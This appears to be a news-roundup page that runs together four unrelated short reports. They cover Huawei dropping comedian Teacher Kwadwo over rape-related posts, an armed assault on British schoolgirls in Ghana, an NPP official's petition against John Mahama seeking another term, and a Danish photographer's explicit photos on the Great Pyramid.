Technology company, Huawei Mobile, has announced that it has severed its relationship with comedian Teacher Kwadwo. The announcement comes a few days after the comedian took to social media to disclose that he no longer has any contract with Huawei. The termination of the contract was precipitated by a petition by PepperDem Ministries, a feminist group, to the company to halt their work relationship with Teacher Kwadwo, citing rape-related posts made by the comedian and teacher, on his Facebook timeline as the reason for their call. Four British girls and their teacher were sexually assaulted at gunpoint on a school trip to Ghana. The terrified victims were attacked in their hostel-style accommodation by a man with a rifle while on a volunteering trip to the West African country. It is believed a Ghanaian security guard was shot and seriously injured after trying to stop the sickening attack on Saturday night. The pupils, aged 16 and 17, flew to Ghana on the trip that was meant to give them the “opportunity to experience life in a developing country”. The Ashanti Regional Chairman of the New Patriotic Party (NPP), Bernard Antwi Boasiako has initiated moves aimed at preventing former President John Dramani Mahama from seeking another term in office. According to Mr Antwi Boasiako popularly referred to as Chairman Wontumi, Mr Mahama has already served two terms in office in line with what the 1992 constitution prescribes and therefore another term in office would be his third, which he claims was against the constitution. He has subsequently prepared a petition to be sent to Parliament and the Electoral Commission, to urge the two bodies to prevent Mr Mahama from seeking another term in office. Authorities in Egypt are investigating after a Danish photographer climbed the Great Pyramid and took explicit pictures at the top. Images of Andreas Hvid and an unidentified woman are posted on his website and were included in a YouTube video he shot while climbing the monument. The video is no longer posted on his YouTube page but others have reposted it, and the footage shows the Dane and the woman reaching the 455ft top and looking out over the view of Cairo below. An explicit still picture which is inserted into the video and posted on his website shows Mr Hvid on top of the woman who is lying on the summit of the 4,500-year-old pyramid.
